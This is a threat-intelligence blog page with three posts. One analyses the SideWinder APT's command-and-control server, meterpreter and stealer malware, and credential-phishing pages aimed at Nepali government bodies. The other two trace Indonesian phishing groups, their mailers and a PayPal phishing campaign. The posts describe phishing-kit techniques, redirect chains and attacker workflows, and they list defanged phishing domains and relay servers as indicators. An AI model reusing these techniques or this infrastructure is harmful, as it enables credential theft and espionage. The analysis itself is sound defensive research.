Monday, March 8, 2021

Renewed SideWinder Activity in South Asia

A few months ago, Trend Micro released a post which encapsulated the SideWinder APT group activity in the past year, showcasing SideWinder’s mobile malware development aspirations and spear phishing campaigns targeting the government and military of Nepal, the government of Afghanistan, the Myanma Posts and Telecommunications state owned company, the Chinese Ministry of Foreign Affairs, and several other entities.

The SideWinder APT which is also tracked as RAZOR TIGER, APT-C-17, and Rattlesnake is known to pick its targets in the South Asia region in multiple previous campaigns [1, 2, 3]. SideWinder’s targets mainly consist of the countries of Nepal, Pakistan, Afghanistan, and China along with some other target countries from the group’s known past activity. This threat group is somewhat believed to be associated with Indian interests and seems to mainly choose to target government and military entities in its espionage attacks.

While we were hunting through world scan data provided by BinaryEdge, we encountered an interesting server during our research which was hosting an executable file that led us on a path to uncover a renewed set of activity being conducted by the SideWinder group - picking right where they left off from in their previous year of operation.

Key Findings:
  • The group renewed its spear phishing activity with new domains registered targeting government entities in Nepal.
  • Nepal recently cancelled its upcoming elections scheduled for 30 April and 10 May 2021.
  • Uncovered evidence of the group likely targeting Nepal's Election Commission.
  • Evidence of continued efforts of malware development being conducted by the group.

Command and Control

The server which was the initial point in our investigation was hosting the following shellcode we identified in the scan response we checked on port 8087.

Server's raw response showing an expected C2 domain connection.

Outputting this raw data for initial analysis and triage, we managed to figure out this was most likely 2nd stage malware being used for Command and Control purposes through this server.

PE-Studio showing us the malware's used libraries, headers, references, and compilation date.

And as we continued our search throughout the server, we realized that it was also communicating with what looked to be 1st stage malware via port 8085. We think that such 1st stage malware is being used in SideWinder’s spear phishing attacks, and we suspect that a sample of one was uploaded in January to VirusTotal.
Upon further search, we managed to find the 2nd stage payload that was being used by the group and hosted on this server via a simple text file encoded in Base64. After a straightforward decode, we were able to see the code used by the threat actor for the 2nd stage payload they are utilizing.
Meterpreter 2nd Stage Payload code excerpt.

We immediately had our assumption verified, as we were able to see that the server is being used for command and control purposes using a meterpreter based payload written in Python.

First Stage Payload

An example of what we suspect this group is using that precedes the command and control infrastructure we first laid eyes on was this malware file uploaded to VirusTotal:

An .hta file most likely attached to spear phishing emails.

We suspect that this actor is using malicious .hta files that are attached to emails containing links to decoy document lures along with embedded 1st stage malware inside the hta files. Here we see such an embedded link to a PE-file being disguised as a txt file being used to deploy spyware upon execution.

Once this spyware is downloaded the malware will check for the environment it’s running in and attempt to identify the infected machine’s IP address with an external HTTP request.

External request to an online IP check API.

Another Python based malware, this specific sample runs in the background after execution and creates a database file of extracted logins from browser files, creates archived files of all of the infected machine's downloads, documents, and desktop files to a then daunting task of exfiltration.
Utilizing the WriteFile function to write the stolen data to files.
Immediately after execution the malware attempts to steal files, writing the stolen browser data to a "Loginvault.db" file and .zip files using the folder location, the machine's IP address and datestamp as the naming scheme.

Exfiltration attempt to the C2 server using port 8080.

This spyware sample takes us directly to the spear phishing efforts we suspect SideWinder may be conducting while using similar malware techniques.

Spear Phishing

Another finding that we encountered while searching through the contents and configurations of this server were the decoy pages SideWinder is using to phish against their intended targets. When we looked at what was being hosted we were surprised to find the server as a single staging point for a lot of the group’s phishing activity (on top of some mobile malware development efforts we cover further along in the post).

The server we were investigating was using various dynamic DNS resolutions to the main IP address and resolving almost all of the domain names with naming schemes that mimic the naming convention of the real entities SideWinder are targeting.

SideWinder are still very adamant at focusing their attention on the same entities they’ve previously attempted to target as showcased by Trend Micro’s report, while adding some additional in-country organizations to their target list.

As of the last few weeks, it seems this group has renewed its activity and started to ramp up attack efforts against their targets of choice. For example, through our investigation of the server, we’ve managed to find that the group is renewing their efforts against government entities of Nepal and setting up phishing infrastructure to launch such campaigns.

In our findings, it seems that SideWinder has added the Ministry of Physical Infrastructure and Transport of Nepal to their list of targets and are still actively trying to gain access to other government offices of the country.

Ministry of Physical Infrastructure and Transport of Nepal domain and login panel.

Another such target in Nepal is the Ministry of Foreign Affairs with a preceding lure intended on motivating the recipient to login with their credentials to be able to continue reading the decoy article planted by the threat actor. In this case, a press release by the Nepal Mission to the UN pertaining to the COVID-19 situation around the region, and human rights issues.

Ministry of Foreign Affairs decoy lure.

A short while after accessing the link the unsuspecting reader will be redirected to the Ministry’s login page.

After a redirect from the lure article, the reader is redirected to this login panel.

Here CapTipper
is showcasing us the ~15 seconds it takes to get redirected from the initial decoy article to the login panel.

The phishing efforts being conducted by the group in this activity are reliant on the content delivery backbone of the actual target website to deliver all of the page's media and redirect to it once credentials are entered. Meaning the actor controlled server just hosts basic phishing kits which use the target's own content delivery network to mimic the respective login panel which they are targeting.

The fake page making lookup requests to the real Nepal Foreign Affairs government website.

Some other decoy tricks that are being employed by the group in this campaign are error messages hardcoded in the phishing pages. Such as the one in a phishing page spoofing the Nepal central government email system:

Source code showing the hardcoded error message.

Or an additional one hardcoded in the phishing page targeting the Ministry of Defense:

Ministry of Defense login panel with a hardcoded error.

We imagine this is a social engineering tactic employed by the actor in efforts of achieving further enticement to enter login credentials by adding pretext to complete the action.

We have also witnessed renewed attention in efforts against organizations such as the Nepal state owned Nepal Telecom company, while continuing the techniques of utilizing the real website’s content backbone including the reCaptcha widget.

Nepal Telecom phishing page piggybacking the reCaptcha widget.

As you can see, the SideWinder group is still very interested in targeting entities located in Nepal. With an additionally very interesting phishing page we managed to find being hosted on this server to what we think is also a current and new target focus for the group.

This new phishing target seems to be the Election Commission of Nepal:

A phishing page targeting the Election Commission of Nepal

As we've shown previously, the actor is again utilizing the same tactic of loading the content from the real government website and redirecting to it once credentials are entered:

This finding is particularly interesting considering the fact that Nepal was meant to be having elections fast approaching in April and May of this year, only to be very recently overturned as of last week.

Considering that these elections were only recently announced in the end of December 2020, we think that this proves as to some of the motivation behind the group’s renewed activity and new target focus as of the past couple of months.


There were a few other findings we gathered from this server which we decided not to blog about in this post as we didn't consider them much different from the phase of operations this group was at at the end of last year. Like some which were connected to the mobile malware applications being developed by SideWinder, as this part of their operations seems to be still very much in the development and testing stage. As evident by what looks like internal testing left behind by the developers.

Log left behind by the group.

We also can’t confirm that all of the phishing infrastructure we uncovered will indeed be infected with malware or have a preceding malicious payload once in use. Even with the proximity of the phishing pages residing on the same server with other malware it remains unclear at this stage. Some of these pages may very well be used in single purpose credential phishing campaigns.

On the other hand, what we did cover in this post indicates how SideWinder is very much focused on conducting espionage operations against their target area of interest in South Asia. Taking into account what this group has done in the past year; we see that we should take this renewed activity as an indication that SideWinder will only continue to ramp up its activities in the rest of the upcoming months of 2021 and beyond.

The group’s continued interest in Nepal serves as evidence to that – We can only speculate that regional developments such as the potential elections in countries of the region, geopolitical tensions such as the military clashes in the India-China border, international events mixed in with regional efforts such as COVID-19 vaccine distribution, and other regional interests will only continue to fuel such campaigns conducted by the group in South Asia. We should anticipate more of such spear phishing activity and further development of their malware and specific mobile malware capabilities to launch such campaigns against the group’s targets of interest.

Indicators of Compromise





Wednesday, September 5, 2018

Indonesian Spam Communities

In our last post we tried to shed some light at what seemed to appear as a very common PayPal phishing email at first glance, but evidently turned out to be connected to a quite larger and more unique campaign the deeper we looked at. When we investigated that single email, we were actually able to discover a wide ranging spam group originating from Indonesia which looked to be responsible for the phishing activity we originally saw. Through that seemingly common PayPal phishing email, we found out that an Indonesian group was targeting various well-known companies’ customer base by mass sending phishing emails via uniquely identifiable Twitter shortened URL redirections. 

They have done so with great success, as we demonstrated by showing you some of the attacker’s self-shared screenshots of incoming victim credit card information. And we last left off by identifying some additional Twitter handles spreading phishing links and hunting some more connected infrastructure to that specific campaign.

Since our last update on the matter, we’ve continued to monitor this group’s activity, passing along our findings to relevant parties. However, in the process of studying this group, we’ve also discovered a secondary set of the Indonesian spamming community in addition to the already identified SlackerC0de and Spammer ID from our previous post. This secondary group uses a set of slightly different tools and techniques, but stays true to the identical core of collective financial scamming efforts which we've previously written about.

While we were looking at what the Spammer ID guys were doing in their group, we saw that they began discussing an additional mailing tool they were using called "Sendinbox". Up to this point we saw that they were mainly sharing their use of mailing tools like "heart sender" and "GX40 sender". We've also seen the Spammer ID group try and use XAMPP with sendmail from their localhost relaying through SlackerC0de infrastructure. They used these methods along with web based tools on their group websites like the ones we saw them make available on tool[.]slackerc0de[.]usWhen we took a look at what "Sendinbox" was -  we saw that it was a PHP tool based on the popular PHPMailer library.  After we started going through the group's chat we witnessed them discuss how they're setting this tool through their shared group servers mainly using Apple and PayPal phishing letters as their payload.
As you can see from the above screenshots, the 'Sendinbox' tool lets the attacker send a set of many emails at once with a preconfigured scam message through mail relay servers. In this example an attacker is testing if his emails are being received as regular inbox mails or filtered as spam to his own Yahoo account. We kept seeing this type of "QA" process being taken by the different stages of server changes by the attackers. 

BMarket ID
"Sendinbox" is made by an "Eka Syahwan" who runs a separate community of groups to Spammer ID on various social platforms. The main purpose for this being to provide support for his user base to whom he sold his mailer tool. A happy customer in this case brings in more potential buyers. The main website for this community - Bmarket[.]or[.]id also hosts a relay server for email campaigns hxxp://bmarket[.]or[.]id/sendinbox-server[.]php

A close knit user base such as this offers the potential scammer support for his phishing campaigns, the tool creator provides updates to the tool and workarounds to potential service blocks. Which kept amounting the more we looked at their group correspondence. Group members complained that the provided email servers were not mailing their scams successfully or that they're going to spam folders. So we witnessed a heavy shift from the recognized servers like bmarket[.]or[.]id to group members actively looking for compromised servers to relay their emails.  
Group members such at the one above started looking for compromised servers to upload their sendinbox tool for future campaign use and shared them with the group. Once they've gained their successful hold on a compromised website, they uploaded their SendInbox email tool as can be seen below.
Other members also shared their use of vulnerability scanning tools to hunt for potential servers in the group chat.
Along with the proactive hunting these group members were conducting, they were monitoring another website belonging to the "Sendinbox" tool creator called IndoXploit which listed additional compromised servers for them to use in their phishing campaigns.

Eka Syahwan even lists this fact on his personal Facebook profile, along with regular updates to his scamming activity, as we can see in his most recent  warning post about some rippers that recently tried to do business with him on Telegram:

Since this is a smaller community with a tendency to share their success and failures a little bit more than Spammer ID - it made it easier for us to track what they were doing in their campaigns. And this group was definitely busy - we've seen them successfully harvest many CC records via targeted email lists, ranging from alphabetically ordered emails to emails from specific sectors like large educational institutions in the US. 
An email list an attacker has prepared to massively spam his phishing letters. This list is alphabetically ordered Yahoo accounts which were already validated as Apple users. 
We've witnessed this group target specific sectors or user base, such as in the below example of them targeting specifically Japanese users from IT provider Softbank Japan:
This group is also sophisticated enough to socially engineer the appropriate letters for a geographically and linguistic group like these Japanese Apple users as we picked them testing out various Japanese templates, how they're received in a Japanese Yahoo, and bouncing if possible off Japanese accounts.

Successfully harvested credentials received in an attacker's email.

We only were able to look at the shared incoming credentials in the group chats, which amounted to hundreds of victims by our count. If we were to combine the credentials which weren't being shared it probably would make the true number of their victims much higher than that. 

Traditional phishing hunting operations tend to rely on certificate and brandname watching. This tactic offers to usually be quite successful since phishing domains don't tend to have a lifespan larger than a day or two, and if by any chance the phishing page wasn't hunted, it at least is usually reported as fake by wary users. 
The threat that closed scamming communities such as BMarket poses is the advantage of crowdsourcing their setbacks and problems. While a single and lone scammer might quit after being unsuccessful in his attack, a strong base of experienced users, and in this case a tool creator looking to satisfy his clients will immediately fix what is being broken or detected by phish domain watchers. It also offers some confidentiality to their operations. A small group such as this is harder to track when it doesn't make much noise beyond their chat platforms. While some of their phishing domains are quickly identified, when looking at their operations - we saw that a lot of Apple and PayPal customers still fell victim to their ploy. We also think this is due to this group's heavy use of shortened and redirected links.
In the grander scheme of the cybercrime landscape, it seems that relying on passive hunting may not replace actively tracking and infiltrating cybercrime groups to successfully mitigate some parts of phishing activity such as this. 


Twitter handles connected to this group:

Phishing Domains:


Used Mailing Infrastructure:





Compromised Websites Shared By the Group:
*Currently unconfirmed if being used by the group.

Friday, July 20, 2018

Uncovering A PayPal Phishing Campaign

While browsing the DC9723 group, we stumbled on a screenshot which one its group's members had just shared with the rest of the DefCon group. The group member had received what he claimed was a PayPal phishing email. He claimed he had received it in the previous day (July 14th) and that it contained a fake receipt for a purchase he had never made from an alleged Italian internet hosting company.

When we looked into this "Aruba IT" company - we saw that it actually was a legitimate internet hosting and domain registration company based out of Italy.
Which raised our curiosity to further look into the email itself and see if anything else could be recovered that points to any clues to this campaign, who else might be being used as a front, and if we can identify any malicious activity.

The screenshot shared by the DC9723 user.
Fake Receipt Phishing

By using a fake receipt like this, an attacker wishes to alarm that a substantial purchase had just been made in the recipient's name. Hoping such a message will motivate the recipient into taking action where a more traditional phishing email might not.
The attacker in this case copied the main PayPal template for electronic receipts, by doing so the attacker wishes to scare the recipient into logging into the PayPal site and give away their credentials.
Conveniently so,  as seen in the above screenshot, a line which isn't present in a real PayPal receipt had been added -
" You don't recognize this transaction? " with an embedded link that can be seen at the bottom of the email.

In all probability, this had been added to further guide the potential target along the attacker's desired path of action in which he'd like him to take; and it serves as correlated pretext to resolve this supposed receipt misunderstanding.
Upon a further look, we can also see this email contains some spelling mistakes and mistyped numbers. Perhaps intentional to add a state of confusion to the already dire financial situation the target could feel he is in, and an even further sense of urgency to resolve this whole issue. Or more likely this just means that this was recompiled in haste.  

The reply emails:, stand out as obvious spoofs.  

pavpal[.]com had been seen in old phishing activity in the past and had since been registered by the actual PayPal company in probable efforts of blocking this type of activity.
paypai[.]com had also been observed in numerous scamming attempts and phishing campaigns with its domain belonging to Moniker Online Services.
Both are widely reported websites. This makes arriving to the conclusion if this attacker actually has current control of these email boxes very hard.

The embedded link to the fake PayPal resolution center this attacker chose to use was
based on Twitter's link shortener:
  • t[.]co/Tv5Zo3ig7v
Taking a peek at the link and looking at its redirect chain:

We can identify that the actual target domain was paypa[.]com-verifyseeds[.]support

By searching for similar pages based on the resource path we could identify similar domains being used in the past two weeks:
  • paypal[.]com-webapps[.]site
  • paypal[.]com-webappsinfo[.]reviews
  • paypa[.]com.lakukerascok[.]com
  • paypal[.]com-accountverify[.]support
  • paypal.accountinfoverify[.]support
  • paypa[.]com-verifyseeds[.]support
  • paypal[.]com-verifyaccount[.]center/ 
  • paypal[.]com-accountservice[.]info
Along with the following redirects:
  • t[.]co-d3gbfd[.]city
  • huit[.]re/tettew
  • huit[.]re/shrt
  • huit[.]re/_Ebfo0oe
  • xt[.]lv/XJiEa
  • alif[.]idseedapp[.]in
  • huit[.]re/webappss
  • kuntulmaju[.]ml/cuk 
  • huit[.]re/satumilyar
  • 1.googleincsafe[.]org/brinjilan
  • https://ok[.]ru/dk?cmd=logExternal&st.cmd=logExternal&
  • https://ok[.]ru/dk?cmd=logExternal&st.cmd=logExternal&
Based on these different redirects made us suspect a phishing kit was being used here and spread during these couple of weeks.
The live domain which is currently still live and being used through the redirection chain is:

Which can be seen redirecting us to
www.paypa[.]com-verifyseeds[.]support - the redirection domain from our screenshot
And www.paypa[.]com.lakukerascok[.]com

Since the email was immediately reported to PayPal, we can witness the effectiveness of redirection chains to the longevity of phishing scams.
Both of these websites are hosted on the same Google server - 142.4.14[.]169
Along with a now empty Apache server:

All pointing to the same styled ‘/stylec0de’ path like the following full URI path example:


Using a redirection path utilizing Paypal’s own authentication API backbone to piggyback as a means of seemingly legitimate Paypal correspondence.
A victim looking to quickly resolve a financial issue might not go over the very long link, and miss the spoofed URL at the end of it - giving away his credentials to the attacker. By using a malicious iframe like this, a sophisticated campaign can be achieved relying on a victim’s

Source code.

Screenshot of the Spoofed login page.
Twitter Activity

From this point on, we only had the now blocked websites left to go over, however since we can trace back activity to Twitter - we can actually hunt for anyone that was spreading these links and see if there’s any new activity, or maybe even find out who is behind this. This is due to the attacker’s choice of a shortened link.

We were able to identify the following accounts that seem be based out of Indonesia:
All of these accounts were using the same method and similar links. The original link from the screenshot could be found being spread by @uboldmild
Tweet of the original link.

As an elementary step of an investigation like this we checked for the usernames and names left by these individuals.

The Twitter user “Donna Curry” was registered under the handle ‘uboldmild’. Once we pivoted it to a simple search engine search, we managed to find it was connected to numerous phishing websites with the same scheme registered under the email

Websites such as :
  • step-verivy[.]com
  • app-recoveryicloud[.]com
  • data-recoveryicloud[.]com
  • idmsa-accounts-security[.]com
  • datarecoveryicloud[.]com
  • com-verifyaccountappstore[.]info
  • responsibilitiesmacintosh[.]com
By looking at the Twitter account we can further correlate this by looking at what sort of links have been tweeted out by the user:

With what looks like the first tweet being made to test out how the link shortener works on June 2017.
This shows us how the phishing kits they used may have evolved along the past year, the same initial weaponization point of utilizing Twitter’s link shortener had not.

When checking the rest of the users, we found that the user @StyleC0de has been doing the same - which can be seen through his Twitter account as well, however, he has done so under his actual name which can be traced back to numerous social media profiles he has under his name. Including a Youtube video showing a script he intended to sell in 2017:

His latest exploit which was still live when we were writing this post is the one we showed you under his still currently used username/calling card ‘StyleC0de’.

SlackerC0de spam group

SlackerC0de is an Indonesian hacking group popping into activity around 2015 with various low level scripts aimed at financial scams.

When we checked the user @nugslackerc0de from Twitter, his username stood out as well. This was what led us to the Indonesian group which can be found at - and this group might actually prove to be the potential connection point between these Indonesian users.

An Apple account checker script shared on Pastebin.

The main name that kept popping up at various source codes belonging to the group was a ‘Malhadi Jr.’ with websites like hosting online tools like email bots and account checkers. Along with even an old personal Github account - sharing similar repositories.

We managed to see that one of his tools was used for a phishing website last year with a similar URL.

Source: ServiceHostNet

So when considering our recent finding, it indeed seemed to us like the Slackerc0de group was a key factor in identifying the common points between the different users.  

Slackerc0de themselves invite any prying eyes to a public group on Telegram where they share their tools of the trade.

When we peeked inside the group, we were able to see behind the scenes of a relatively close knit group collaborating in phishing efforts, like this user asking what a good subject for Yahoo email recipients is:

A now deleted user instructing another member on his preferred link shorteners like Twitter and Owly:

And another one sharing PayPal Phishing Kit’s source code for download:

A user sharing a screenshot of using a mailer with their Apple phishing website present in the background:

We can see this Indonesian group is active with focused efforts in cheating people out of their money, adding insult to injury with boasting their success while sharing screenshots of incoming credentials:

An attacker sharing his harvested credentials.
Tactics,Techniques, and Procedures

This group and those like it operate by initially gathering email lists, ones that can be curated manually, or downloaded from the various cyber crime forums online. Once they have an adequate enough list they will move to their next step - checking the emails for corresponding accounts. They will input the emails they have into account checkers made by the likes of Malhadi Jr from SlackerC0de and see what emails have PayPal accounts, what emails have Apple accounts by utilizing various API calls to these services and see their response. Both these companies seem to be their favorite targets.

Once they have amassed a large enough list to move on and start attacking them, these attackers will create a phishing infrastructure for the most crucial steps of their campaign. They will create an online website, mostly hosted by Amazon,Google, or Aruba (the same company they used as a fake receipt for one of their emails)  from looking at how this specific group operates. They will host their phishing kit and start mass emailing their list using a bought emailer software from their closed forum marketplace or shared by somebody from the chat group.

To receive the incoming credentials they manage to steal, they will set up an inbox based on free email services like Yandex. Not much skill is needed to run such a scheme - they will need to only configure the source code for their email, upload to a server, and use an email template.  By going over their correspondence we saw how users with no skill whatsoever were asking for resources,more experienced users sharing them, and the backbone to these groups - the tool creators or sellers which supply the 955 members of the group with the easy means of creating their own campaign.

We witnessed how they share their various setbacks after they launch their campaign, such as Amazon blocking their accounts, screwing up the %email field, failing to configure a server, and more. Meaning even an attacker at the lowest level of skill will be spoon fed the answer to his mistake and how to correct it for the campaign to work. Causing dire consequences to the victims which fall due to this criminal crowdsourcing.
An attacker sharing a screen capture of his Phishing email.

An attacker sharing a screenshot in hopes of troubleshooting an error.

An attacker sharing a screenshot of his blocked Amazon account.

Historical Observations

We then tried to look for historical correlation and past activity this group may have been connected to, so we started looking through RecordedFuture’s threat intelligence platform for further relationships and activity.
When we initially looked at the main domain - we were looking for what malware RecordedFuture may have seen connected to SlackerC0de[.]us, if any at all. In this case we were able to see that some ransomware activity and various intertwined domains were connected to SlackerC0de[.]us.

Source: RecordedFuture
So we continued to look for connected phishing campaigns, and saw that prior to the July 2018 PayPal and Apple campaign that started our investigation, the group ran earlier campaigns in January - mainly targeting Apple and Facebook users.

Source: RecordedFuture
Meaning this group is probably constantly busy all year round targeting all the varied popular services in efforts of scamming people out of their money and credentials.




DeepEnd Research has already notified Apple and PayPal of these findings prior to the publication of this post.

7/27 - Update:

Since the publication of our blog post the Twitter accounts we found along with the associated YouTube account have been suspended from each respected platform.
During this time we were also continuing to monitor for any renewed activity by any new users possibly using the same methods outlined in this campaign, since the identified ones were suspended.
We managed to find that there is currently one newly registered Twitter user still using the same construct of various shortened links leading to PayPal login phishing pages:

This user is registered under the name 'Tanya D Campero' - 

The links tweeted out by this user lead us to the following new websites and infrastructure used by this campaign: